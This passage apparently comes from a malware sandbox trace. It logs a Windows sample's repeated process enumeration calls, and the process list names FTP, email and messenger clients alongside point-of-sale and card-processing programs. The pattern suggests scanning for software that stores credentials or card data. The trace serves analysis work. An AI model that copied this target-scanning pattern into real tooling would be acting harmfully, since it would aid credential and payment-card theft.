th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0254.174] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.176] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0254.178] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0254.181] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0254.183] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0254.185] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.187] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0254.189] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0254.191] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0254.193] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0254.195] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0254.198] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0254.250] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0254.253] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0254.255] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0254.257] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0254.259] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0254.261] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0254.263] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0254.265] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0254.267] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0254.269] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0254.271] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0254.273] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0254.275] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0254.278] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0254.280] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0254.282] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0254.284] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0254.286] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0254.288] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0254.290] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0254.292] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0254.343] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0254.345] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0254.347] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0254.350] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0254.352] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0254.355] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0254.358] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0254.360] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0254.363] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0254.365] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0254.367] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0254.368] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0254.370] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0254.372] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0254.374] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0254.375] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0254.377] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0254.378] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0254.380] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0254.382] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0254.383] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0254.385] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0254.386] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0254.412] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0254.414] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0254.415] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0254.417] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0254.421] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0254.423] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0254.425] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0254.426] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0254.428] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0254.431] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0254.433] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0254.439] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0254.441] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0254.444] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0254.446] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0254.448] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0254.487] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0254.490] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0254.492] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0254.495] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0254.502] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0254.505] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0254.507] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0254.510] CloseHandle (hObject=0x758) returned 1 [0254.510] Sleep (dwMilliseconds=0x64) [0254.625] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0254.635] Process32First (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.637] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0254.641] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0254.643] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, 